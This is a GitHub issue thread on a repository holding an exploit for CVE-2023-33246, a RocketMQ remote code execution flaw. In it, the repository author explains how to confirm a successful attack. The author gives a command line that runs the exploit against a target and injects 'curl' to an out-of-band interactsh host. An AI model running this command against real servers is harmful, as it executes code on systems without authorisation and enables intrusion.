Malayke / CVE-2023-33246_RocketMQ_RCE_EXPLOIT

CVE-2023-33246 RocketMQ RCE Detect By Version and Exploit
Apache License 2.0
98 stars 21 forks

help or any advice #1

Open conneciton360 opened 1 year ago

conneciton360 commented 1 year ago

Thanks for the code, but after I run your code I get an empty response. Do you have any advice to help?

Malayke commented 1 year ago

Which script did you run? check.py or CVE-2023-33246_RocketMQ_RCE_EXPLOIT.py?

If you are running CVE-2023-33246_RocketMQ_RCE_EXPLOIT.py, exploiting this vulnerability will not directly return the code execution result.

You can go to https://app.interactsh.com/ and grab a subdomain like RANDOM_STRING.oast.fun,

then construct exploit params like

python3 CVE-2023-33246_RocketMQ_RCE_EXPLOIT.py <YOUR_ROCKETMQ_LISTEN_IP_ADDRESS> <ROCKETMQ_LISTEN_PORT> curl RANDOM_STRING.oast.fun/test

If the exploit is successful, you can see some HTTP and DNS requests in https://app.interactsh.com/